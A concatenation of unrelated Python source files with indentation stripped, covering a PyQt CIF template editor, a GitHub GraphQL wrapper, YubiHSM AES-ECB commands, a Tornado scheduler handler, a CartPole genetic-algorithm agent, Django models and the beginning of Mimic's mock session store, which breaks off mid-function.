from pathlib import Path
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QListWidgetItem, QTableWidget, QListWidget, QStackedWidget
from gemmi import cif
from cif.text import retranslate_delimiter, utf8_to_str
from equip_property.tools import read_document_from_cif_file
from gui.custom_classes import MyQPlainTextEdit
from gui.dialogs import cif_file_open_dialog, show_general_warning, cif_file_save_dialog
from tools.misc import predef_prop_templ
from tools.settings import FinalCifSettings
with suppress(ImportError):
from appwindow import AppWindow
class Properties:
def __init__(self, app: 'AppWindow', settings: FinalCifSettings):
self.app = app
self.settings = settings
self.signals_and_slots()
self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(0)
self.app.ui.PropertiesEditTableWidget.verticalHeader().hide()
self.store_predefined_templates()
self.show_properties()
def signals_and_slots(self):
## properties
self.app.ui.EditPropertyTemplateButton.clicked.connect(self.edit_property_template)
self.app.ui.SavePropertiesButton.clicked.connect(self.save_property_template)
self.app.ui.CancelPropertiesButton.clicked.connect(self.cancel_property_template)
self.app.ui.DeletePropertiesButton.clicked.connect(self.delete_property)
## properties
self.app.ui.PropertiesEditTableWidget.itemSelectionChanged.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.cellPressed.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.itemEntered.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.cellChanged.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.currentItemChanged.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.itemActivated.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.itemPressed.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.itemClicked.connect(self.add_property_row_if_needed)
self.app.ui.PropertiesEditTableWidget.itemChanged.connect(self.add_property_row_if_needed)
self.app.ui.NewPropertyTemplateButton.clicked.connect(self.new_property)
self.app.ui.ImportPropertyTemplateButton.clicked.connect(self.import_property_from_file)
self.app.ui.ExportPropertyButton.clicked.connect(self.export_property_template)
def show_properties(self) -> None:
"""
Display saved items in the properties lists.
"""
self.app.ui.PropertiesTemplatesListWidget.clear()
property_list = self.settings.get_properties_list()
for pr in property_list:
if pr:
item = QListWidgetItem(pr)
self.app.ui.PropertiesTemplatesListWidget.addItem(item)
def new_property(self) -> None:
item = QListWidgetItem('')
self.app.ui.PropertiesTemplatesListWidget.addItem(item)
self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(item)
item.setFlags(Qt.ItemIsEditable | Qt.ItemIsEnabled | Qt.ItemIsSelectable)
self.app.ui.PropertiesTemplatesListWidget.editItem(item)
self.app.ui.cifKeywordLineEdit.clear()
def add_property_row_if_needed(self) -> None:
"""
Adds an empty row at the bottom of either the PropertiesEditTableWidget.
"""
table = self.app.ui.PropertiesEditTableWidget
rowcount = table.rowCount()
cont = 0
for row in range(rowcount):
key = ''
with suppress(AttributeError, TypeError):
key = table.item(row, 0).text()
with suppress(AttributeError, TypeError):
key = table.cellWidget(row, 0).getText()
if key: # don't count empty key rows
cont += 1
diff = rowcount - cont
if diff < 4:
table.insertRow(rowcount)
# The properties templates:
def delete_property(self) -> None:
# First delete the list entries
index = self.app.ui.PropertiesTemplatesListWidget.currentIndex()
property_name = index.data()
self.settings.delete_template('property', property_name)
# now make it invisible:
self.app.ui.PropertiesTemplatesListWidget.takeItem(index.row())
self.cancel_property_template()
# I do these both to clear the list:
self.store_predefined_templates()
self.show_properties()
def edit_property_template(self) -> None:
"""
Edit the Property table.
"""
# make sure the current item doesnt get lost:
it = self.app.ui.PropertiesTemplatesListWidget.currentItem()
self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(None)
self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(it)
self.app.ui.CancelEquipmentButton.click()
self.load_property_from_settings()
def save_property_template(self) -> None:
table = self.app.ui.PropertiesEditTableWidget
stackedwidget = self.app.ui.PropertiesTemplatesStackedWidget
listwidget = self.app.ui.PropertiesTemplatesListWidget
keyword = self.app.ui.cifKeywordLineEdit.text()
self.save_property(table, stackedwidget, listwidget, keyword)
self.app.refresh_combo_boxes()
def store_predefined_templates(self) -> None:
property_list = self.settings.get_properties_list() or []
for item in predef_prop_templ:
if not item['name'] in property_list:
self.settings.save_settings_list('property', item['name'], item['values'])
def export_property_template(self, filename: str = '') -> None:
"""
Exports the currently selected property entry to a file.
"""
selected_row_text = self.app.ui.PropertiesTemplatesListWidget.currentIndex().data()
if not selected_row_text:
return
prop_data = self.settings.load_settings_list('property', selected_row_text)
table_data = []
cif_key = ''
if prop_data:
cif_key = prop_data[0]
with suppress(Exception):
table_data = prop_data[1]
if not cif_key:
return
doc = cif.Document()
blockname = '__'.join(selected_row_text.split())
block = doc.add_new_block(blockname)
try:
loop = block.init_loop(cif_key, [''])
except RuntimeError:
# Not a valid loop key
show_general_warning('"{}" is not a valid cif keyword.'.format(cif_key))
return
for value in table_data:
if value:
loop.add_row([cif.quote(utf8_to_str(value))])
if not filename:
filename = cif_file_save_dialog(blockname.replace('__', '_') + '.cif')
if not filename.strip():
return
try:
doc.write_file(filename, style=cif.Style.Indent35)
# Path(filename).write_text(doc.as_string(cif.Style.Indent35))
except PermissionError:
if Path(filename).is_dir():
return
show_general_warning('No permission to write file to {}'.format(Path(filename).resolve()))
def import_property_from_file(self, filename: str = '') -> None:
"""
Imports a cif file as entry of the property templates list.
"""
if not filename:
filename = cif_file_open_dialog(filter="CIF file (*.cif)")
if not filename:
return
doc = read_document_from_cif_file(filename)
if not doc:
return
property_list = self.settings.settings.value('property_list')
if not property_list:
property_list = ['']
block = doc.sole_block()
template_list = []
loop_column_name = ''
for i in block:
if i.loop is not None:
if len(i.loop.tags) > 0:
loop_column_name = i.loop.tags[0]
for n in range(i.loop.length()):
value = i.loop.val(n, 0)
template_list.append(retranslate_delimiter(cif.as_string(value).strip("\n\r ;")))
block_name = block.name.replace('__', ' ')
# This is the list shown in the Main menu:
property_list.append(block_name)
table = self.app.ui.PropertiesEditTableWidget
table.setRowCount(0)
self.app.ui.cifKeywordLineEdit.setText(loop_column_name)
newlist = [x for x in list(set(property_list)) if x]
newlist.sort()
# this list keeps track of the property items:
self.settings.save_template_list('property_list', newlist)
template_list.insert(0, '')
template_list = list(set(template_list))
# save as dictionary for properties to have "_cif_key : itemlist"
# for a table item as dropdown menu in the main table.
table_data = [loop_column_name, template_list]
self.settings.save_template_list('property/' + block_name, table_data)
self.show_properties()
def load_property_from_settings(self) -> None:
"""
Load/Edit the value list of a property entry.
"""
table = self.app.ui.PropertiesEditTableWidget
listwidget = self.app.ui.PropertiesTemplatesListWidget
table.blockSignals(True)
table.clearContents()
table.setRowCount(0)
index = listwidget.currentIndex()
if index.row() == -1:
# nothing selected
# self.app.ui.PropertiesEditTableWidget.blockSignals(False)
return
selected_row_text = listwidget.currentIndex().data()
table_data = self.settings.load_settings_list('property', selected_row_text)
if table_data:
cif_key = table_data[0]
with suppress(Exception):
table_data = table_data[1]
self.app.ui.cifKeywordLineEdit.setText(cif_key)
if not table_data:
table_data = ['', '', '']
for value in table_data:
try:
self.add_propeties_row(table, retranslate_delimiter(str(value)))
except TypeError:
print('Bad value in property table')
continue
self.add_propeties_row(table, '')
self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(1)
table.blockSignals(False)
# table.setWordWrap(False)
table.resizeRowsToContents()
@staticmethod
def add_propeties_row(table: QTableWidget, value: str = '') -> None:
"""
Add a new row with a value to the Property table.
"""
# Create a empty row at bottom of table
row_num = table.rowCount()
table.insertRow(row_num)
# Add cif key and value to the row:
# item_val = MyTableWidgetItem(value)
# table.setItem(row_num, 0, item_val)
key_item = MyQPlainTextEdit(parent=table, minheight=50)
key_item.row = row_num
key_item.setPlainText(value)
## This is critical, because otherwise the add_row_if_needed does not work as expected:
# key_item.textChanged.connect(self.add_row_if_needed)
table.setCellWidget(row_num, 0, key_item)
def save_property(self, table: QTableWidget,
stackwidget: QStackedWidget,
listwidget: QListWidget,
keyword: str = '') -> None:
"""
Saves the currently selected Property template to the config file.
"""
# Set None Item to prevent loss of the currently edited item:
# The current item is closed and thus saved.
table.setCurrentItem(None)
selected_template_text = listwidget.currentIndex().data()
table_data = []
ncolumns = table.rowCount()
for rownum in range(ncolumns):
try:
# only one column!
value = table.cellWidget(rownum, 0).getText()
except AttributeError:
value = ''
if value:
table_data.append(value)
# make sure to have always a blank item first:
table_data.insert(0, '')
if keyword:
# save as dictionary for properties to have "_cif_key : itemlist"
# for a table item as dropdown menu in the main table.
table_data = [keyword, table_data]
self.settings.save_template_list('property/' + selected_template_text, table_data)
stackwidget.setCurrentIndex(0)
print('saved')
def cancel_property_template(self) -> None:
"""
Cancel editing of the current template.
"""
table = self.app.ui.PropertiesEditTableWidget
table.clearContents()
table.setRowCount(0)
self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(0)
|
import unittest
from logging import INFO
from common import exceptions
import logger
from series import FileParser
class KnownValues(unittest.TestCase):
File_SxxExx = {}
File_SxxExx['FileName'] = ""
File_SxxExx['SeriesName'] = 'Covert Affairs'
File_SxxExx['SeasonNum'] = 1
File_SxxExx['EpisodeNums'] = [1]
File_SxxExx['type'] = 'episode'
File_SxxExx['Ext'] = 'ext'
class FileParserExceptions(unittest.TestCase):
def setUp(self):
TRACE = 5
VERBOSE = 15
logger.initialize(unit_test=True, level=INFO)
# logger.start(level=ERROR)
self.library = FileParser()
def test_FileParser_exception_case_001(self):
# should raise an exception for missing or invalid patient_id
KnownValues.File_SxxExx['FileName'] = '/mnt/Download/Bittorrent/the.big.bang.theory.season.1.avi'
self.assertRaises(exceptions.InvalidFilename, self.library.getFileDetails, KnownValues.File_SxxExx['FileName'])
def theSuite(self):
suite = unittest.TestLoader().loadTestsFromTestCase(self)
return suite
if __name__ == '__main__':
suite = FileParserExceptions.theSuite()
unittest.TextTestRunner(verbosity=2).run(suite)
|
import click
from cached_property import cached_property
from sgqlc.endpoint.http import HTTPEndpoint
from github_team_organizer.classes.github import GitHubWrapper
class GitHubGraphQL:
__instance = None
url = 'https://api.github.com/graphql'
def __new__(cls, *args, **kwargs):
if GitHubGraphQL.__instance is None:
GitHubGraphQL.__instance = super().__new__(cls, *args, **kwargs)
return GitHubGraphQL.__instance
@cached_property
def headers(self):
return {
'Authorization': f'bearer {GitHubWrapper().login_or_token}',
}
@cached_property
def endpoint(self):
return HTTPEndpoint(self.url, self.headers)
def call(self, *args, **kwargs):
result = self.endpoint(*args, **kwargs)
if result.get('errors'):
click.secho(f'Error occured: {result}', bg='yellow')
exit(1)
return result
|
"""
implementations of AES ECB block cipher commands to execute on a YubiHSM
"""
# Copyright (c) 2011 Yubico AB
# See the file COPYING for licence statement.
import struct
__all__ = [
# constants
# functions
# classes
#'YHSM_Cmd_AES_ECB',
'YHSM_Cmd_AES_ECB_Encrypt',
'YHSM_Cmd_AES_ECB_Decrypt',
'YHSM_Cmd_AES_ECB_Compare',
]
import pyhsm.defines
import pyhsm.exception
from pyhsm.cmd import YHSM_Cmd
class YHSM_Cmd_AES_ECB(YHSM_Cmd):
""" Common code for command classes in this module. """
status = None
key_handle = 0x00
def __init__(self, stick, command, payload):
YHSM_Cmd.__init__(self, stick, command, payload)
def __repr__(self):
return '<%s instance at %s: key_handle=0x%x>' % (
self.__class__.__name__,
hex(id(self)),
self.key_handle
)
def parse_result(self, data):
# typedef struct {
# uint32_t keyHandle; // Key handle
# uint8_t ciphertext[YSM_BLOCK_SIZE]; // Ciphertext block
# YHSM_STATUS status; // Encryption status
# } YHSM_ECB_BLOCK_ENCRYPT_RESP;
# OR
# typedef struct {
# uint32_t keyHandle; // Key handle
# uint8_t plaintext[YSM_BLOCK_SIZE]; // Plaintext block
# YHSM_STATUS status; // Decryption status
# } YHSM_ECB_BLOCK_DECRYPT_RESP;
fmt = "< I %is B" % (pyhsm.defines.YSM_BLOCK_SIZE)
key_handle, \
result, \
self.status = struct.unpack(fmt, data)
# check that returned key_handle matches the one in the request
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
return result
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
class YHSM_Cmd_AES_ECB_Encrypt(YHSM_Cmd_AES_ECB):
"""
Have the YubiHSM AES ECB encrypt something using the key of a key handle.
"""
def __init__(self, stick, key_handle, plaintext):
pyhsm.util.input_validate_str(plaintext, name='plaintext', max_len = pyhsm.defines.YSM_BLOCK_SIZE)
self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
# typedef struct {
# uint32_t keyHandle; // Key handle
# uint8_t plaintext[YHSM_BLOCK_SIZE]; // Plaintext block
# } YHSM_ECB_BLOCK_ENCRYPT_REQ;
payload = struct.pack('<I', key_handle) + \
plaintext.ljust(pyhsm.defines.YSM_BLOCK_SIZE, chr(0x0))
YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_ENCRYPT, payload)
class YHSM_Cmd_AES_ECB_Decrypt(YHSM_Cmd_AES_ECB):
"""
Have the YubiHSM AES ECB decrypt something using the key of a key handle.
"""
def __init__(self, stick, key_handle, ciphertext):
self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
pyhsm.util.input_validate_str(ciphertext, name='ciphertext', exact_len = pyhsm.defines.YSM_BLOCK_SIZE)
# #define YHSM_BLOCK_SIZE 16 // Size of block operations
# typedef struct {
# uint32_t keyHandle; // Key handle
# uint8_t ciphertext[YHSM_BLOCK_SIZE]; // Ciphertext block
# } YHSM_ECB_BLOCK_DECRYPT_REQ;
fmt = "< I %is" % (pyhsm.defines.YSM_BLOCK_SIZE)
payload = struct.pack(fmt, key_handle, ciphertext)
YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_DECRYPT, payload)
class YHSM_Cmd_AES_ECB_Compare(YHSM_Cmd_AES_ECB):
"""
Have the YubiHSM AES ECB decrypt something using the key of a key handle, and
then compare it with a plaintext we supply.
Requires you to know the plaintext to verify if the ciphertext matches it,
providing added security in some applications.
"""
def __init__(self, stick, key_handle, ciphertext, plaintext):
self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
pyhsm.util.input_validate_str(ciphertext, name='ciphertext')
pyhsm.util.input_validate_str(plaintext, name='plaintext')
# #define YHSM_BLOCK_SIZE 16 // Size of block operations
# typedef struct {
# uint32_t keyHandle; // Key handle
# uint8_t ciphertext[YHSM_BLOCK_SIZE]; // Ciphertext block
# uint8_t plaintext[YHSM_BLOCK_SIZE]; // Plaintext block
# } YHSM_ECB_BLOCK_DECRYPT_CMP_REQ;
fmt = "< I %is %is" % (pyhsm.defines.YSM_BLOCK_SIZE, pyhsm.defines.YSM_BLOCK_SIZE)
payload = struct.pack(fmt, key_handle, ciphertext, plaintext)
YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_DECRYPT_CMP, payload)
def parse_result(self, data):
# #define YHSM_BLOCK_SIZE 16 // Size of block operations
# typedef struct {
# uint32_t keyHandle; // Key handle
# YHSM_STATUS status; // Decryption + verification status
# } YHSM_ECB_BLOCK_VERIFY_RESP;
fmt = "< I B"
key_handle, \
self.status = struct.unpack(fmt, data)
# check that returned key_handle matches the one in the request
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
return True
if self.status == pyhsm.defines.YSM_MISMATCH:
return False
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
|
"""Handler for executions endpoint."""
from datetime import datetime
from datetime import timedelta
import tornado.gen
import tornado.web
from ndscheduler import settings
from ndscheduler.corescheduler import constants
from ndscheduler.corescheduler import utils
from ndscheduler.server.handlers import base
class Handler(base.BaseHandler):
def _get_execution(self, execution_id):
"""Returns a dictionary of a job execution info.
This is a blocking operation.
:param str execution_id: Execution id.
:return: If success, a dictionary of a job execution info; otherwise, a dictionary
of error message.
:rtype: dict
"""
execution = self.datastore.get_execution(execution_id)
if not execution:
self.set_status(400)
return {"error": "Execution not found: %s" % execution_id}
return execution
@tornado.concurrent.run_on_executor
def get_execution(self, execution_id):
"""Wrapper for _get_execution() to run on threaded executor.
:param str execution_id: Execution id.
:return: Job execution info.
:rtype: str
"""
return self._get_execution(execution_id)
# @tornado.gen.coroutine
# def get_execution_yield(self, execution_id):
# """Wrapper for get_execution to run in async mode
# :param str execution_id: Execution id.
# """
# return_json = yield self.get_execution(execution_id)
# self.finish(return_json)
def _get_executions(self):
"""Returns a dictionary of executions in a specific time range.
This is a blocking operation.
:return: executions info.
:rtype: dict
"""
now = datetime.utcnow()
time_range_end = self.get_argument("time_range_end", now.isoformat())
ten_minutes_ago = now - timedelta(minutes=10)
time_range_start = self.get_argument("time_range_start", ten_minutes_ago.isoformat())
executions = self.datastore.get_executions(time_range_start, time_range_end)
return executions
@tornado.concurrent.run_on_executor
def get_executions(self):
"""Wrapper for _get_executions to run on threaded executor.
:return: executions info.
:rtype: dict
"""
return self._get_executions()
@tornado.web.authenticated
@tornado.web.removeslash
@tornado.gen.coroutine
def get(self, execution_id=None):
"""Returns a execution or multiple executions.
Handles two endpoints:
GET /api/v1/executions (when execution_id == None)
It takes two query string parameters:
- time_range_end - unix epoch timestamp. Default: now
- time_range_start - unix epoch timestamp. Default: 10 minutes ago.
These two parameters limit the executions to return:
time_range_start <= execution.scheduled_time <= time_range_end
GET /api/v1/executions/{execution_id} (when execution_id != None)
:param str execution_id: Execution id.
"""
if execution_id is None:
# self.get_executions_yield()
return_json = yield self.get_executions()
else:
# self.get_execution_yield(execution_id)
return_json = yield self.get_execution(execution_id)
self.finish(return_json)
def _run_job(self, job_id):
"""Kicks off a job.
:param str job_id: Job id.
:return: A dictionary with the only field of execution_id.
:rtype: dict
"""
job = self.scheduler_manager.get_job(job_id)
if not job:
self.set_status(400)
return {"error": "Job not found: %s" % job_id}
job_name = utils.get_job_name(job)
args = utils.get_job_args(job)
kwargs = job.kwargs
scheduler = utils.import_from_path(settings.SCHEDULER_CLASS)
execution_id = scheduler.run_job(
job_name,
job_id,
settings.DATABASE_CLASS,
self.datastore.db_config,
self.datastore.table_names,
*args,
**kwargs
)
# Audit log
self.datastore.add_audit_log(
job_id, job.name, constants.AUDIT_LOG_CUSTOM_RUN, user=self.username, description=execution_id,
)
response = {"execution_id": execution_id}
return response
@tornado.concurrent.run_on_executor
def run_job(self, job_id):
"""Wrapper for _run_job() to run on threaded executor.
:param str job_id: String for a job id.
:return: A dictionary with the only field of execution_id.
:rtype: dict
"""
return self._run_job(job_id)
@tornado.web.authenticated
@tornado.web.removeslash
@tornado.gen.coroutine
def post(self, job_id):
"""Runs a job.
Handles an endpoint:
POST /api/v1/executions
Args:
job_id: String for job id.
"""
return_json = yield self.run_job(job_id)
self.finish(return_json)
@tornado.web.authenticated
@tornado.web.removeslash
def delete(self, job_id):
"""Stops a job execution.
Handles an endpoint:
POST /api/v1/executions
"""
raise tornado.web.HTTPError(501, "Not implemented yet.")
|
# A provider for performing the necessary SPARQL queries.
# This was taken from the interim wikidata fuzzysearch backend, and is not fully working at all, which is
# why this file is commented out
# class SPARQLProvider:
# def query_variable(self, dataset, variable):
# query = f'''
# select ?dataset_id ?variable_id ?variable_name ?property_id
# where {{
# ?dataset_ wdt:P1813 ?dname .
# FILTER (str(?dname) = "{dataset}")
# ?variable_ wdt:P361 ?d .
# ?variable_ wdt:P1813 ?vname .
# ?variable_ rdfs:label ?variable_name .
# FILTER (str(?vname) = "{variable}")
# ?variable_ wdt:P1687 ?property_ .
# BIND(REPLACE(STR(?dataset_), "(^.*)(Q.+$)", "$2") AS ?dataset_id)
# BIND(REPLACE(STR(?variable_), "(^.*)(Q.+$)", "$2") AS ?variable_id)
# BIND(REPLACE(STR(?property_), "(^.*)(Q.+$)", "$2") AS ?property_id)
# }}
# '''
# print(query)
# sparql.setQuery(query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# print(response)
# if response['results']['bindings']:
# binding = response['results']['bindings'][0]
# return {
# 'dataset_id': binding['dataset_id']['value'],
# 'variable_id': binding['variable_id']['value'],
# 'property_id': binding['property_id']['value'],
# 'variable_name': binding['variable_name']['value']
# }
# return {}
# def query_qualifiers(self, variable_id, property_id):
# query = f'''
# select ?qualifier_id ?qual_name
# where {{
# wd:{variable_id} p:{property_id} ?st .
# ?st ps:{property_id} ?qual_ .
# ?st pq:P1932 ?qual_name .
# BIND(REPLACE(STR(?qual_), "(^.*)(P.+$)", "$2") AS ?qualifier_id)
# }}
# '''
# print(query)
# sparql.setQuery(query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# print(response)
# qualifiers = {binding['qualifier_id']['value']:binding['qual_name']['value']
# for binding in response['results']['bindings']}
# return qualifiers
# def query_data(self, dataset_id, property_id, places, qualifiers, limit, cols):
# # Places are not implemented in SPARQL yet
# select_columns = '?dataset ?main_subject_id ?value ?value_unit ?time ?coordinate ' + ' '.join(f'?{name}_id' for name in qualifiers.values())
# qualifier_query = ''
# for pq_property, name in qualifiers.items():
# qualifier_query += f'''
# ?o {pq_property} ?{name}_ .
# BIND(REPLACE(STR(?{name}_), "(^.*)(Q.\\\\d+$)", "$2") AS ?{name}_id)
# '''
# dataset_query = self._get_direct_dataset_query(
# property_id, select_columns, qualifier_query, limit)
# print(dataset_query)
# sparql.setQuery(dataset_query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# parsed = self._parse_response(response, dataset_id, cols)
# return parsed
# def _get_direct_dataset_query(self, property_id, select_columns, qualifier_query, limit):
# dataset_query = f'''
# SELECT {select_columns} WHERE {{
# VALUES(?property_id_ ?p ?ps ?psv) {{
# (wd:{property_id} p:{property_id} ps:{property_id} psv:{property_id})
# }}
# ?main_subject_ ?p ?o .
# # ?o ?ps ?value .
# ?o ?psv ?value_obj .
# ?value_obj wikibase:quantityAmount ?value .
# optional {{
# ?value_obj wikibase:quantityUnit ?unit_id .
# ?unit_id rdfs:label ?value_unit .
# FILTER(LANG(?value_unit) = "en")
# }}
# ?o pq:P585 ?time .
# optional {{
# ?main_subject_ wdt:P625 ?coordinate
# }}
# optional {{
# ?o pq:P2006020004 ?dataset_ .
# BIND(REPLACE(STR(?dataset_), "(^.*/)(Q.*)", "$2") as ?dataset)
# }}
# {qualifier_query}
# BIND(REPLACE(STR(?main_subject_), "(^.*/)(Q.*)", "$2") AS ?main_subject_id)
# }}
# ORDER BY ?main_subject_id ?time
# '''
# if limit > -1:
# dataset_query = dataset_query + f'\nLIMIT {limit}'
# print(dataset_query)
# return dataset_query
# def _parse_response(self, response, dataset_id, cols):
# results = []
# # for row, record in enumerate(response['results']['bindings']):
# for record in response['results']['bindings']:
# record_dataset = ''
# if 'dataset' in record:
# record_dataset = record['dataset']['value']
# # Skip record if dataset does not match
# if record_dataset != dataset_id:
# # Make an exception for Wikidata, which does not have a dataset field
# if dataset_id == 'Wikidata' and record_dataset == '':
# pass
# else:
# print(f'Skipping: not {record_dataset} == Q{dataset_id}')
# # continue
# result = {}
# for col_name, typed_value in record.items():
# value = typed_value['value']
# if col_name in cols:
# result[col_name] = value
# # col = result_df.columns.get_loc(col_name)
# # result_df.iloc[row, col] = value
# if col_name not in COMMON_COLUMN.keys():
# # remove suffix '_id'
# qualifier = col_name[:-3]
# if qualifier not in cols:
# continue
# result[qualifier] = labels.get(value, value)
# # if value in metadata['qualifierLabels']:
# # result[qualifier] = metadata['qualifierLabels'][value]
# # # result_df.iloc[row, result_df.columns.get_loc(qualifier)] = metadata['qualifierLabels'][value]
# # else:
# # print('missing qualifier label: ', value)
# # result[qualifier] = value
# results.append(result)
# return results
|
import logging
import gym
import matplotlib.pyplot as plt
import numpy as np
from gym import logger
from peepo.pp.generative_model import GenerativeModel
from peepo.pp.genetic_algorithm import GeneticAlgorithm
from peepo.pp.peepo import Peepo
from peepo.pp.peepo_network import write_to_file
VISION = 'vision'
MOTOR = 'motor'
class PeepoAgent(Peepo):
def __init__(self, network, action_space, observation_space):
super().__init__(network)
self.action_space = action_space
self.observation_space = observation_space
self.obs = np.empty(4)
self.reward = 0
self.done = False
self.act = 0
self.generative_model = GenerativeModel(self, n_jobs=4)
def update(self, obz, rewardz, donez):
self.obs = obz
self.reward = rewardz
self.done = donez
self.generative_model.process()
return self.act
def observation(self, name):
if VISION.lower() in name.lower():
quad = self.get_quadrant(name)
return self.normalized_distribution(self.obs[quad],
self.observation_space.low[quad],
self.observation_space.high[quad])
if MOTOR.lower() in name.lower():
return [0.1, 0.9] if self.act else [0.9, 0.1]
logging.warning('Reached code which should not be reached in observation')
return [0.5, 0.5]
def action(self, node, prediction):
self.act = np.argmax(prediction)
@staticmethod
def normalized_distribution(value, mini, maxi, target_min=0, target_max=1):
if str(maxi) == '3.4028235e+38':
mini, maxi = -1, 1
x = target_max * ((value - mini) / (maxi - mini)) + target_min
return np.array([x, 1 - x])
@staticmethod
def get_quadrant(name):
for quad in ['0', '1', '2', '3']:
if quad.lower() in name.lower():
return int(quad)
raise ValueError('Unexpected node name %s, could not find 0,1,2,3', name)
if __name__ == '__main__':
logger.set_level(logger.INFO)
env = gym.make('CartPole-v1')
# env = gym.make('BipedalWalker-v2')
env.seed(0)
reward = 0
done = False
max_age = 100
num_individuals = 10
num_generations = 30
ga = GeneticAlgorithm('cartpole',
p_mut_top=0.2,
p_mut_cpd=0.2,
Npop=num_individuals,
max_removal=2)
population = ga.get_population()
avg_fitnesses = []
for gen in range(num_generations):
for i, idv in enumerate(population):
agent = PeepoAgent(idv[1], env.action_space, env.observation_space)
ob = env.reset()
while True:
action = agent.update(ob, reward, done)
ob, reward, done, _ = env.step(action)
# env.render()
if done:
population[i][0] = reward
ob = env.reset()
break
avg_fitness, population, converging = ga.evolve(population)
if avg_fitness < 0:
print(' population collapsed :-(')
break
print('Generation: ' + str(gen) + ' , Average fitness: ' + avg_fitness)
avg_fitnesses.append(avg_fitness)
env.close()
final_network, best_fitness = ga.get_optimal_network()
write_to_file('best_cartpole_network', final_network)
t = np.arange(0.0, len(avg_fitnesses), 1)
fig, ax = plt.subplots()
ax.plot(t, avg_fitnesses)
ax.set(xlabel='generation', ylabel='average fitness',
title='Survival with genetic algorithm')
ax.grid()
plt.show()
|
from django.db import models
class Book(models.Model):
title = models.CharField(max_length=250)
is_published = models.BooleanField(default=False)
class BlogPost(models.Model):
title = models.CharField(max_length=250)
is_published = models.BooleanField(default=False)
|
# -*- test-case-name: mimic.test.test_session -*-
"""
Implementation of simple in-memory session storage and generation for Mimic.
"""
from __future__ import absolute_import, division, unicode_literals
from six import text_type
from uuid import uuid4
from datetime import datetime, timedelta
import attr
@attr.s
class Session(object):
"""
A mimic Session is a record of an authentication token for a particular
username and tenant_id.
"""
username = attr.ib()
token = attr.ib()
tenant_id = attr.ib()
expires = attr.ib()
impersonator_session_map = attr.ib(default=attr.Factory(dict))
_api_objects = attr.ib(default=attr.Factory(dict))
@property
def user_id(self):
"""
Return a unique numeric ID based on the username.
"""
return text_type(hash(self.username))
def impersonator_session_for_token(self, impersonated_token):
"""
:param impersonated_token: impersonation token for a user.
Returns the impersonator session for the given impersonation
token.
"""
return self.impersonator_session_map.get(impersonated_token)
def data_for_api(self, api_mock, data_factory):
"""
Get the application data for a given API, creating it if necessary.
"""
if api_mock not in self._api_objects:
self._api_objects[api_mock] = data_factory()
return self._api_objects[api_mock]
@attr.s
class NonMatchingTenantError(Exception):
"""
A session's tenant ID does not match the desired tenant ID.
"""
session = attr.ib(validator=attr.validators.instance_of(Session))
desired_tenant = attr.ib()
class SessionStore(object):
"""
A collection of sessions addressable by multiple different keys.
Unlike many traditional types of session storage, new authenticated users
are created on demand, since all authentication succeeds by default within
Mimic.
:ivar IReactorTime clock: The clock used to track session expiration.
"""
def __init__(self, clock):
"""
Create a session store with the given IReactorTime provider.
"""
self.clock = clock
self._token_to_session = {
# mapping of token (unicode) to session (Session)
}
self._userid_to_session = {
# mapping of userid (ascii) to session (Session)
}
self._tenant_to_session = {
# mapping of tenant_id (unicode) to session (Session)
}
self._username_to_token = {
# mapping of token (unicode) to username (unicode: key in
# _token_to_session)
}
def _new_session(self, username_key=None, **attributes):
"""
Create a new session and persist it according to its username and token
values.
:param attributes: Keyword parameters containing zero or more of
``username``, ``token``, and ``tenant_id``. Any fields that are
not specified will be filled out automatically.
:return: A new session with all fields filled out and an expiration
time 1 day in the future (according to the clock associated
with this :obj:`MimicCore`).
:rtype: :obj:`Session`
"""
for key in ['username', 'token', 'tenant_id']:
if attributes.get(key, None) is None:
attributes[key] = key + "_" + text_type(uuid4())
if key == 'tenant_id':
# integer tenant IDs - uuid4 ints are too long
attributes[key] = text_type(int(uuid4().int % 1e15))
if 'expires' not in attributes:
attributes['expires'] = (
datetime.utcfromtimestamp(self.clock.seconds())
+ timedelta(days=1)
)
session = Session(**attributes)
if username_key is None:
username_key = session.username
self._username_to_token[username_key] = session.token
self._token_to_session[session.token] = session
self._userid_to_session[session.user_id] = session
self._tenant_to_session[session.tenant_id] = session
return session
def _assert_tenant_matches(self, session, tenant_id):
if tenant_id is not None and session.tenant_id != tenant_id:
raise NonMatchingTenantError(session=session, desired_tenant=tenant_id)
def session_for_token(self, token, tenant_id=None):
"""
:param unicode token: An authentication token previously created by
session_for_api_key or session_for_username_password, or a new
token initialized outside Mimic.
:return: a session for the given token.
:rtype: Session
"""
if token in self._token_to_session:
s = self._token_to_session[token]
self._assert_tenant_matches(s, tenant_id)
elif tenant_id and tenant_id in self._tenant_to_session:
